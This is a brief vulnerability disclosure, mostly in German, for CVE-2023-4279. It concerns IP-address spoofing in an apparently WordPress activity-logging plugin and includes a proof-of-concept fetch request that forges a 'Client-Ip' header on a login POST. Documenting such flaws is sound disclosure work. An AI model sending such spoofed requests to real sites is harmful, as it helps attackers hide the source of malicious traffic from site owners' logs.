
Repository for CVE-2023-4279 vulnerability.
CVE-ID: CVE-2023-4279
Schwachstellentyp: IP-Adressen-Spoofing
Beschreibung: Dieses Plugin bezieht Client-IP-Adressen aus potenziell unsicheren Headern, was einem Angreifer ermöglicht, deren Wert zu manipulieren. Dies kann genutzt werden, um die Quelle bösartigen Datenverkehrs zu verbergen.
Schritte zum Reproduzieren:
1. In User Activity Log > Settings, enable the setting "Allow Ip Address of users to log." and save settings.
2. Führen Sie den folgenden Code im Webbrowser aus und beachten Sie im Backend, dass die IP-Adresse gefälscht wurde.
await fetch("/wp-login.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
"Client-Ip": "8.8.8.8",
},
"body": "log=USERNAME&pwd=PASSWORD",
"method": "POST",
"mode": "cors",
"credentials": "include"
});
Referenzen: